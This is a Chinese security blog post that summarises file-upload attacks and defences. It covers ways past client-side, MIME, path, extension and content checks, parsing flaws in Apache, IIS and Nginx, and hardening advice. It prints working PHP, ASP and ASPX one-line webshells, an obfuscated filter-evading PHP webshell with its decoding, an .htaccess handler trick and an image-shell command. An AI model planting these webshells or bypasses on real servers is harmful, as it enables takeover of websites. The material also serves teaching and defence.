<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="文件上传," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="概述Web站点一般会有用户注册的功能，当用户注册之后，大多数情况下都会存在类似头像上传等个性化的设置，这些功能点往往存在上传验证方式不严格的安全缺陷，这些安全缺陷在Web渗透中是非常关键的突破口，只要经过仔细测试分析上传验证机制，往往就能找到绕过验证的方法，进而上传恶意代码获取整个Web业务控制权，复杂一点的情况是配合 Web Server的解析漏洞来获取控制权。">
<meta name="keywords" content="文件上传">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传总结">
<meta property="og:url" content="http://yoursite.com/2017/04/26/文件上传总结/index.html">
<meta property="og:site_name" content="Note&#39;s blog">
<meta property="og:description" content="概述Web站点一般会有用户注册的功能，当用户注册之后，大多数情况下都会存在类似头像上传等个性化的设置，这些功能点往往存在上传验证方式不严格的安全缺陷，这些安全缺陷在Web渗透中是非常关键的突破口，只要经过仔细测试分析上传验证机制，往往就能找到绕过验证的方法，进而上传恶意代码获取整个Web业务控制权，复杂一点的情况是配合 Web Server的解析漏洞来获取控制权。">
<meta property="og:image" content="http://i4.buimg.com/567571/b550d626b5da432f.jpg">
<meta property="og:image" content="http://i4.buimg.com/567571/8214aaadde6b44e0.jpg">
<meta property="og:image" content="http://i4.buimg.com/567571/627f8315d7c9f2ef.jpg">
<meta property="og:image" content="http://yoursite.com/2017/04/26/文件上传总结/图片马制作.jpg">
<meta property="og:updated_time" content="2017-06-25T02:07:46.756Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件上传总结">
<meta name="twitter:description" content="概述Web站点一般会有用户注册的功能，当用户注册之后，大多数情况下都会存在类似头像上传等个性化的设置，这些功能点往往存在上传验证方式不严格的安全缺陷，这些安全缺陷在Web渗透中是非常关键的突破口，只要经过仔细测试分析上传验证机制，往往就能找到绕过验证的方法，进而上传恶意代码获取整个Web业务控制权，复杂一点的情况是配合 Web Server的解析漏洞来获取控制权。">
<meta name="twitter:image" content="http://i4.buimg.com/567571/b550d626b5da432f.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/04/26/文件上传总结/"/>





  <title>文件上传总结 | Note's blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Note's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/04/26/文件上传总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Note">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/favico.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Note's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                文件上传总结
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-04-26T09:48:41+08:00">
                2017-04-26
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>Web站点一般会有用户注册的功能，当用户注册之后，大多数情况下都会存在类似头像上传等个性化的设置，这些功能点往往存在上传验证方式不严格的安全缺陷，这些安全缺陷在Web渗透中是非常关键的突破口，只要经过仔细测试分析上传验证机制，往往就能找到绕过验证的方法，进而上传恶意代码获取整个Web业务控制权，复杂一点的情况是配合 Web Server的解析漏洞来获取控制权。</p>
<a id="more"></a>
<h1 id="上传检测流程"><a href="#上传检测流程" class="headerlink" title="上传检测流程"></a>上传检测流程</h1><p>通常一个文件以HTTP协议进行上传时，将以POST请求发送至Web服务器，Web服务器接收到请求并同意后，用户与Web服务器将建立连接，并传输数据。一般文件上传过程中将会经过如下几个检测步骤：<br><img src="http://i4.buimg.com/567571/b550d626b5da432f.jpg" alt=""></p>
<ul>
<li>客户端JavaScript检测         (通常为检测文件扩展名)</li>
<li>服务端MIME类型检测             (检测Content-Type内容)</li>
<li>服务端目录路径检测             (检测跟Path参数相关的内容)</li>
<li>服务端文件扩展名检测         (检测跟文件extension相关的内容)</li>
<li>服务端文件内容检测             (检测内容是否合法或含有恶意代码)</li>
</ul>
<h1 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h1><h2 id="客户端检测-JavaScript检测"><a href="#客户端检测-JavaScript检测" class="headerlink" title="客户端检测(JavaScript检测)"></a>客户端检测(JavaScript检测)</h2><p>这类检测，通常是在上传页面里含有专门检测文件上传的JavaScript代码，最常见的就是检测扩展名是否合法，示例代码如下：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">function</span> <span class="function"><span class="title">check</span></span>()</div><div class="line">&#123;</div><div class="line">  var filename = document.getElementById(<span class="string">"file"</span>);</div><div class="line">  var str = filename.value.split(<span class="string">"."</span>);</div><div class="line">  var ext = str[str.length-1];</div><div class="line">  <span class="keyword">if</span>(ext==<span class="string">'jpg'</span>||ext==<span class="string">'png'</span>||ext==<span class="string">'jpeg'</span>||ext==<span class="string">'gif'</span>)</div><div class="line">  &#123;</div><div class="line">    <span class="built_in">return</span> <span class="literal">true</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span></div><div class="line">  &#123;</div><div class="line">    alert(<span class="string">"仅允许上传png/jpeg/gif类型的文件！"</span>)</div><div class="line">    <span class="built_in">return</span> <span class="literal">false</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="built_in">return</span> <span class="literal">false</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>判断该类检测的方法：选择一个禁止上传类型的文件上传，当点击确定按钮之后，浏览器立即弹窗提示禁止上传，一般就可以断定为客户端JavaScript检测，进一步确定可以通过配置浏览器HTTP代理（没有流量经过代理就可以证明是客户端JavaScript检测）。</p>
<p><strong>绕过方法</strong>： </p>
<ul>
<li>上传页面，审查元素，修改JavaScript检测函数；</li>
<li>将需要上传的恶意代码文件类型改为允许上传的类型，例如将dama.asp改为dama.jpg上传，配置Burp Suite代理进行抓包，然后再将文件名dama.jpg改为dama.asp。</li>
<li>上传webshell.jpg.jsp，可能前端程序检查后缀时，从前面开始检查。</li>
</ul>
<h2 id="服务端MIME类型检测"><a href="#服务端MIME类型检测" class="headerlink" title="服务端MIME类型检测"></a>服务端MIME类型检测</h2><p>服务器端检测文件MIME类型可能的代码如下：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">  <span class="keyword">if</span>(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'type'</span>]!=<span class="string">"image/gif"</span>)</div><div class="line">  &#123;//检测Content-type</div><div class="line">    <span class="built_in">echo</span><span class="string">"Sorry,weonlyallowuploadingGIFimages"</span>;</div><div class="line">	<span class="built_in">exit</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="variable">$uploaddir</span>=<span class="string">'uploads/'</span>;</div><div class="line">  <span class="variable">$uploadfile</span>=<span class="variable">$uploaddir</span>.basename(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'name'</span>]);</div><div class="line">  <span class="keyword">if</span>(move_uploaded_file(<span class="variable">$_FILES</span>[<span class="string">'userfile'</span>][<span class="string">'tmp_name'</span>],<span class="variable">$uploadfile</span>))</div><div class="line">  &#123;</div><div class="line">    <span class="built_in">echo</span><span class="string">"Fileisvalid,andwassuccessfullyuploaded.\n"</span>;</div><div class="line">  &#125;</div><div class="line">  <span class="keyword">else</span></div><div class="line">  &#123;</div><div class="line">    <span class="built_in">echo</span><span class="string">"Fileuploadingfailed.\n"</span>;</div><div class="line">  &#125;</div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p><strong>绕过方法</strong>：<br>配置Burp Suite代理进行抓包，将Content-Type修改为image/gif，或者其他允许的类型。</p>
<h2 id="服务端目录路径检测"><a href="#服务端目录路径检测" class="headerlink" title="服务端目录路径检测"></a>服务端目录路径检测</h2><p>上传的数据包中，如果存在path(或者其他名称)等能够操作上传路径的参数，修改该参数配合解析漏洞Get Webshell，该方法一般asp系统用比较多。<br>例如path参数为如下“upfile/”，可以尝试修改为“upfile.asp/”或者“upfile/1.asp/”或者“upfile/1.asp;.”，注意观察返回的文件名。返回的文件名可能为：upfile/1.asp;.201704117886.jpg，满足IIS6.0解析漏洞。</p>
<h2 id="服务端文件扩展名检测"><a href="#服务端文件扩展名检测" class="headerlink" title="服务端文件扩展名检测"></a>服务端文件扩展名检测</h2><p><strong>黑名单检测</strong>：<br>黑名单的安全性比白名单低很多，服务器端，一般会有个专门的blacklist文件，里面会包含常见的危险脚本文件类型，例如：html | htm | php | php2 | hph3 | php4 | php5 | asp | aspx | ascx | jsp | cfm | cfc<br> bat | exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh等等。<br><strong>白名单检测</strong>：<br>仅允许指定的文件类型上传，比如仅允许上传jpg | gif | doc | pdf等类型的文件，其他文件全部禁止。 </p>
<p><strong>绕过方法</strong>：</p>
<ul>
<li>文件名大小写绕过：<br>使用Asp、PhP之类的文件名绕过黑名单检测</li>
<li>名单列表绕过：<br>用黑名单里没有的名单进行攻击，比如很名单中没有的asa或者cer之类</li>
<li>特殊文件名绕过：<br>比如在发送的HTTP包中，将文件名改为”dama.asp.”或者”dama.asp_”(下划线为空格)，这种命名方式在window系统里是不被允许的，所以需要在Burp Suite中抓包修改，上传之后，文件名会被window自动去掉后面的点或者空格，需要注意此种方法仅对window有效，Unix/Linux系统没有这个特性。</li>
<li><p>0x00截断绕过：<br>伪代码如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">Name = getname(http requests)//假如这一步获取到的文件名是dama.asp .jpg</div><div class="line">Type = gettype(name)//而在该函数中，是从后往前扫描文件扩展名，所以判断为jpg文件</div><div class="line">If(<span class="built_in">type</span> == jpg)</div><div class="line">SaveFileToPath(UploadPath.name , name)//但在这里却是以0x00作为文件名截断，最后以dama.asp存入路径里</div></pre></td></tr></table></figure>
<p>操作方法：上传dama.jpg，Burp抓包，将文件名改为dama.php%00.jpg，选中%00，进行url-decode。</p>
</li>
<li><p>上传.htaccess文件攻击：（适用于黑名单检测方式，黑名单中未限制.htaccess）<br>该文件仅在Apache平台上存在，IIS平台上不存在该文件，该文件默认开启，启用和关闭在httpd.conf文件中配置。该文件的写法如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;FilesMatch <span class="string">"_php.gif"</span>&gt;</div><div class="line"> SetHandler application/x-httpd-php</div><div class="line">&lt;/FilesMatch&gt;</div></pre></td></tr></table></figure>
<p>保存为.htaccess文件。该文件的意思是，只要遇到文件名中包含有”_php.gif”字符串的，统一按照php文件来执行。该文件在Apache里默认是启用的，如果没启用，启用方法见：<a href="http://www.jb51.net/article/25476.htm" target="_blank" rel="external">http://www.jb51.net/article/25476.htm</a> 然后就可以上传一个带一句话木马的文件，例如a_php.gif，会被当成php执行。该方法其实不是漏洞，是Apache的特性。该方法常用于黑客入侵网站之后，不想被发现，留一个隐蔽的后门。在PHP手册中提到一句话，move_uploaded_file section,there is awarning which states‘If the destination file already exists, it will be overwritten.’服务器端如果采用了黑名单的形式限制上传，但是黑名单中却没有.htaccess文件，那么我们可以上传.htaccess文件覆盖掉原来的文件。</p>
</li>
<li>解析漏洞绕过<br>直接上传一个注入过恶意代码的非黑名单文件即可，再利用解析漏洞利用。</li>
</ul>
<h2 id="服务端文件内容检测"><a href="#服务端文件内容检测" class="headerlink" title="服务端文件内容检测"></a>服务端文件内容检测</h2><p>如果文件内容检测设置的比较严格，那么上传攻击将变得非常困难。以最常见的图片类型内容检测举例。</p>
<ul>
<li>文件幻数检测：<br>JPG    ：    FF D8 FF E0 00 10 4A 46 49 46<br>GIF    ：    47 49 46 38 39 61    (GIF89a)<br>PNG：    89 50 4E 47<br><strong>绕过方法</strong>：<br>在文件幻数后面加上自己的一句话木马就行了。</li>
<li>文件相关信息检测：<br>一般就是检查图片文件的大小，图片文件的尺寸之类的信息。<br><strong>绕过方法</strong>：<br>伪造好文件幻数，在后面添加一句话木马之后，再添加一些其他的内容，增大文件的大小。</li>
<li>文件加载检测：<br>这个是最变态的检测，一般是调用API或者函数去进行文件加载测试，常见的是图像渲染测试，再变态一点的甚至是进行二次渲染。<br><strong>绕过方法</strong>：<br>针对渲染加载测试：代码注入绕过<br>针对二次渲染测试：攻击文件加载器</li>
</ul>
<p><strong>通常，对于文件内容检查的绕过，就是直接用一个结构完整的文件进行恶意代码注入即可。</strong></p>
<h1 id="Web-Server解析漏洞"><a href="#Web-Server解析漏洞" class="headerlink" title="Web Server解析漏洞"></a>Web Server解析漏洞</h1><h2 id="Apache解析漏洞"><a href="#Apache解析漏洞" class="headerlink" title="Apache解析漏洞"></a>Apache解析漏洞</h2><p>一个文件名为xxx.x1.x2.x3的文件（例如：index.php.fuck）， Apache会从x3的位置往x1的位置开始尝试解析，如果x3不属于Apache能解析的扩展名，那么Apache会尝试去解析x2的位置，这样一直往前尝试，直到遇到一个能解析的扩展名为止。<br>WampServer2.0AllVersion(WampServer2.0i/Apache2.2.11)<br>WampServer2.1AllVersion(WampServer2.1e-x32/Apache2.2.17)<br>Wamp5AllVersion(Wamp5_1.7.4/Apache2.2.6)<br>AppServ2.4AllVersion(AppServ-2.4.9/Apache2.0.59)<br>AppServ2.5AllVersion(AppServ-2.5.10/Apache2.2.8)<br>AppServ2.6AllVersion(AppServ-2.6.0/Apache2.2.8)<br>以上集成环境都存在扩展名解析顺序漏洞，并且这些环境都存在对php3文件按照php来解析这个小洞。该方法针对黑名单不全时，能够绕过。<br>总结存在该漏洞的Apache版本：<br>Apache2.0.x&lt;=2.0.59<br>Apache2.2.x&lt;=2.2.17</p>
<h2 id="IIS解析漏洞"><a href="#IIS解析漏洞" class="headerlink" title="IIS解析漏洞"></a>IIS解析漏洞</h2><h3 id="IIS6-0"><a href="#IIS6-0" class="headerlink" title="IIS6.0"></a>IIS6.0</h3><p>a.文件类型<br>正常：www.xxx.com/logo.jpg<br>触发漏洞：www.xxx.com/logo.asp;.jpg<br>按照Ⅰ来访问logo.jpg，文件会被当成是jpg图片来解析，想办法，能够按照Ⅱ来访问logo.jpg，文件就会被当成asp文件来处理。（如果IIS支持PHP，那么logo.php;.jpg也会被当成PHP文件执行）   <br>b.文件夹类型<br>正常：www.xxx.com/image/logo.jpg<br>触发漏洞：www.xxx.com/image.asp/logo.jpg<br>按照Ⅰ来访问logo.jpg，文件会被当成是jpg图片来解析，想办法，能够按照Ⅱ来访问logo.jpg，文件就会被当成asp文件来处理。（如果IIS支持PHP，那么image.php文件夹下的文件也会被当做PHP文件解析。）</p>
<h3 id="IIS7-0以上"><a href="#IIS7-0以上" class="headerlink" title="IIS7.0以上"></a>IIS7.0以上</h3><p>IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞，对任意文件名只要在URL后面追加上字符串”/任意文件名.php”就会按照php的方式去解析。（例如：webshell.jpg/x.php）<br>IIS7.0(Win2008R1+IIS7.0)<br>IIS7.5(Win2008R2+IIS7.5)<br>IIS的解析漏洞不像Apache那么模糊，针对IIS6.0，只要文件名不被重命名基本都能搞定。这里要注意一点，对于”任意文件名/任意文件名.php”这个漏洞其实是出现自php-cgi 的漏洞， 所以其实跟IIS自身是无关的。</p>
<h2 id="Nginx解析漏洞"><a href="#Nginx解析漏洞" class="headerlink" title="Nginx解析漏洞"></a>Nginx解析漏洞</h2><p>目前Nginx主要有这两种漏洞：<br>a.一个是对任意文件名，在后面添加”/任意文件名.php”的解析漏洞，比如原本文件名是test.jpg，可以添加为test.jpg/x.php进行解析攻击。<br>b.低版本的Nginx可以在任意文件名后面添加%00.php进行解析攻击。<br>Nginx0.5.<em><br>Nginx0.6.</em><br>Nginx0.7.<em> &lt;= 0.7.65<br>Nginx0.8.</em> &lt;= 0.8.37<br>对于”任意文件名/任意文件名.php”这个漏洞其实是出现自php-cgi的漏洞，所以其实跟Nginx自身是无关的。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>从攻击者的角度来给上传分类：</p>
<ul>
<li><p>轻量级检测绕过<br>a.绕过前端JavaScript检测：使用Burp抓包改包。<br>b.绕过服务器端MIME类型检测：使用Burp抓包改包。</p>
</li>
<li><p>路径/文件扩展名检测绕过<br>a.黑名单检测方式<br>文件名大小写绕过；<br>名单列表绕过；<br>特殊文件名绕过；<br>0x00截断绕过；<br>.htaccess文件攻击；<br>本地文件包含漏洞；<br>Apache解析漏洞；<br>IIS解析漏洞；<br>Nginx解析漏洞；<br>b.白名单检测方式<br>0x00截断绕过；<br>本地文件包含漏洞；<br>Apache解析漏洞；<br>IIS解析漏洞；<br>Nginx解析漏洞；</p>
</li>
<li><p>文件内容检测方式<br><img src="http://i4.buimg.com/567571/8214aaadde6b44e0.jpg" alt=""><br>对文件进行恶意代码注入，再配合解析漏洞。</p>
</li>
</ul>
<h1 id="文件上传防御"><a href="#文件上传防御" class="headerlink" title="文件上传防御"></a>文件上传防御</h1><p><img src="http://i4.buimg.com/567571/627f8315d7c9f2ef.jpg" alt=""><br>图中带红点的是防御的重要环节：</p>
<ul>
<li>轻量级检测必然能绕过</li>
<li>检测的重点放在文件内容检测</li>
<li>路径/扩展名检测一定要用白名单</li>
<li>不能有本地文件包含漏洞</li>
<li>随时注意更新Web应用软件</li>
</ul>
<h1 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">php  :  &lt;?php @<span class="built_in">eval</span>(<span class="variable">$_POST</span>[‘lzx’]);?&gt;</div><div class="line">     :  &lt;?php  <span class="variable">$a</span> = <span class="string">"a"</span>.<span class="string">"s"</span>.<span class="string">"s"</span>.<span class="string">"e"</span>.<span class="string">"r"</span>.<span class="string">"t"</span>;<span class="variable">$a</span>(<span class="variable">$_POST</span>[cc]);?&gt;</div><div class="line">asp  :  &lt;% <span class="built_in">eval</span> request(“lzx”)%&gt;</div><div class="line">aspx :  &lt;%@ Page Language=<span class="string">"Jscript"</span>%&gt;&lt;%<span class="built_in">eval</span>(Request.Item[<span class="string">"lzx"</span>],<span class="string">"unsafe"</span>);%&gt;</div></pre></td></tr></table></figure>
<p>php过狗一句话：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">&lt;?php </div><div class="line">  <span class="variable">$mt</span>=<span class="string">"JF9QT1N"</span>; </div><div class="line">  <span class="variable">$ojj</span>=<span class="string">"QGV2YWwo"</span>;</div><div class="line">  <span class="variable">$hsa</span>=<span class="string">"UWydpMGle"</span>;</div><div class="line">  <span class="variable">$fnx</span>=<span class="string">"5BeSleleddKTs="</span>;</div><div class="line">  <span class="variable">$zk</span> = str_replace(<span class="string">"d"</span>,<span class="string">""</span>,<span class="string">"sdtdrd_redpdldadcde"</span>);</div><div class="line">  <span class="variable">$ef</span> = <span class="variable">$zk</span>(<span class="string">"z"</span>, <span class="string">""</span>, <span class="string">"zbazsze64_zdzeczodze"</span>);  </div><div class="line">  <span class="variable">$dva</span> = <span class="variable">$zk</span>(<span class="string">"p"</span>,<span class="string">""</span>,<span class="string">"pcprpepaptpe_fpupnpcptpipopn"</span>);                                           </div><div class="line">  <span class="variable">$zvm</span> = <span class="variable">$dva</span>(<span class="string">''</span>, <span class="variable">$ef</span>(<span class="variable">$zk</span>(<span class="string">"le"</span>, <span class="string">""</span>, <span class="variable">$ojj</span>.<span class="variable">$mt</span>.<span class="variable">$hsa</span>.<span class="variable">$fnx</span>))); </div><div class="line">  <span class="variable">$zvm</span>(); </div><div class="line">?&gt;</div></pre></td></tr></table></figure></p>
<p>分析：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$zk</span> = <span class="string">"str_replace"</span>;</div><div class="line"><span class="variable">$ef</span> = <span class="variable">$zk</span>(<span class="string">"z"</span>, <span class="string">""</span>, <span class="string">"zbazsze64_zdzeczodze"</span>); </div><div class="line">    = str_replace(<span class="string">"z"</span>, <span class="string">""</span>, <span class="string">"zbazsze64_zdzeczodze"</span>) </div><div class="line">    = <span class="string">"base64_decode"</span></div><div class="line"><span class="variable">$dva</span> = <span class="variable">$zk</span>(<span class="string">"p"</span>,<span class="string">""</span>,<span class="string">"pcprpepaptpe_fpupnpcptpipopn"</span>); </div><div class="line">     = str_replace(<span class="string">"p"</span>,<span class="string">""</span>,<span class="string">"pcprpepaptpe_fpupnpcptpipopn"</span>) </div><div class="line">     = <span class="string">"create_function"</span></div><div class="line"><span class="variable">$zvm</span> = <span class="variable">$dva</span>(<span class="string">''</span>, <span class="variable">$ef</span>(<span class="variable">$zk</span>(<span class="string">"le"</span>, <span class="string">""</span>, <span class="variable">$ojj</span>.<span class="variable">$mt</span>.<span class="variable">$hsa</span>.<span class="variable">$fnx</span>))); </div><div class="line">	 = create_function(<span class="string">''</span>, <span class="variable">$ef</span>(<span class="variable">$zk</span>(<span class="string">"le"</span>, <span class="string">""</span>, <span class="variable">$ojj</span>.<span class="variable">$mt</span>.<span class="variable">$hsa</span>.<span class="variable">$fnx</span>))) </div><div class="line">	 = create_function(<span class="string">''</span>, base64_decode(str_replace(<span class="string">"le"</span>, <span class="string">""</span>, <span class="variable">$ojj</span>.<span class="variable">$mt</span>.<span class="variable">$hsa</span>.<span class="variable">$fnx</span>))) </div><div class="line">	 = create_function(<span class="string">''</span>, base64_decode(str_replace(<span class="string">"le"</span>, <span class="string">""</span>, QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=)))</div><div class="line">     = create_function(<span class="string">''</span>, base64_decode(<span class="string">"QGV2YWwoJF9QT1NUWydpMG5BeSddKTs="</span>))</div><div class="line">     = create_function(<span class="string">''</span>, <span class="string">"@eval(<span class="variable">$_POST</span>['i0nAy']);"</span>)</div></pre></td></tr></table></figure></p>
<p>过狗一句话总结为：打乱字符；编码技术；拆分组合；创建，匹配。</p>
<h1 id="图片木马制作"><a href="#图片木马制作" class="headerlink" title="图片木马制作"></a>图片木马制作</h1><p>命令：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">copy /b 1.jpg+2.php</div></pre></td></tr></table></figure></p>
<p><img src="/2017/04/26/文件上传总结/图片马制作.jpg" alt=""></p>
<h1 id="文件上传防御-1"><a href="#文件上传防御-1" class="headerlink" title="文件上传防御"></a>文件上传防御</h1><p>1.关掉上传文件的功能<br>如果Web应用程序不需要上传文件的功能，则可以直接将上传文件的功能关闭来避免不必要的麻烦。打开“php.ini”文件，找到file uploads的位置，将file_uploads设置成Off。<br>2.限制能够上传的文件大小<br>如果黑客采取连续不断地上传文件，或是上传极大的文件，来使Web应用程序没有更多资源来处理其他来访者的请求，黑客就可以借此来瘫痪网站。PHP的限制机制可以让您限制允许上传文件体积的最大值，来避免来访者上传太大的文件。单独POST请求的最大值，可以使用php.ini文件的upload_max_size来设置。打开“php.ini”文件，找到upload_max_size的位置，将upload_max_size设置成想要的值。<br>3.检查上传文件的类型<br>4.检查上传文件的内容<br>5.上传的文件不要保存在公开的文件夹内，以避免被黑客直接读取。另外将文件的路径隐藏起来，或是将文件名称改成没有扩展名的随机文件名，都可以增加上传文件的安全性。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/文件上传/" rel="tag"># 文件上传</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

